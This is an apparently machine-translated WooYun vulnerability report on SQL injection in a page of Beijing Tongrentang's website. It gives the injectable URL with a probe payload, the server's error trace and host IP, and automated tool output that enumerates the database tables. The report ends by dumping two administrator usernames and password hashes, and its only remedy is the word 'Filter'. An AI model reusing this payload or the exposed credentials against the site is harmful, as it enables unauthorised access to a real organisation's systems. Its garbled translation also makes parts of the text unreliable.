The SQL injection vulnerability exists on the official website of China's Beijing tongrentang (group .. Good, the market value is also: 19.153 billion yuan ..
Detailed description:
Http://www.tongrentang.com/trtxsqy/introduce_yc.php? Id = '% 60% 228rk1B
Error: exception 'pdoexception' with message 'sqlstate [42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\ ''\" 1' at line 1' in/data/web/trt/admin/db. php: 36 Stack trace: #0/data/web/trt/admin/db. php (36): PDO-> query ('select * from... ') #1/data/web/trt/trtxsqy/introduce_yc.php (5): db-> query ('select * from... ') #2 {main}
Analyzing http://www.tongrentang.com/trtxsqy/introduce_yc.php? Id = '% 60% 228rk1B
Host IP: 211.99.194.203
Web Server: nginx
Keyword Found: Error:
I guess injection type is Integer ?! If injection failed, retry with a manual keyword.
DB Server: MySQL
Selected Column Count is 12
Valid String Column is 2
Current DB: trt
Count (table_name) of information_schema.tables where table_schema = 0x747274 is 12
Tables found: admin, advt_swf, article, dianmian, dianmian_en, lib, positioninfotable, product, product_en, tag, user, videocategory
Count (table_name) of information_schema.tables where table_schema = 0x747274 is 12
Tables found: admin, advt_swf, article, dianmian, dianmian_en, lib, positioninfotable, product, product_en, tag, user, videocategory
Count (table_name) of information_schema.tables where table_schema = 0x747274 is 12
Tables found: admin, advt_swf, article, dianmian, dianmian_en, lib, positioninfotable, product, product_en, tag, user, videocategory
Count (column_name) of information_schema.columns where table_schema = 0x747274 and table_name = 0x61646D696E is 5
Columns found: id, username, password, rights, regtime
Count (*) of trt. admin is 2
Data Found: id = 1
Data Found: password = 98245d354279aa2faec79779601dd675
Data Found: username = super
Data Found: id = 2
Data Found: password = e1f1b43c56ea0e9cd9bcd5b2c2981e1e
Data Found: username = yaodian
Solution:
Filter
Author: zeracker @ wooyun